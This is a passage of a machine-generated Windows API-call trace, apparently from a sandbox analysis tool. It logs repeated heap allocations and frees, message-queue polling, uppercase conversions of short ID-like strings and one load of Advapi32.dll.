hHeap=0x25c0000) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0161.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.089] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0161.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0161.090] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0161.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.090] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0161.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.091] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.091] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.091] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.091] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0161.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.092] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.092] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0161.092] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0161.094] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0161.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0161.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.095] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0161.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.096] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0161.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0161.097] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0161.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0161.098] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0161.098] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0161.098] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0161.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.099] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.100] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.100] RtlAllocateHeap (HeapHandle=0x25c0000, 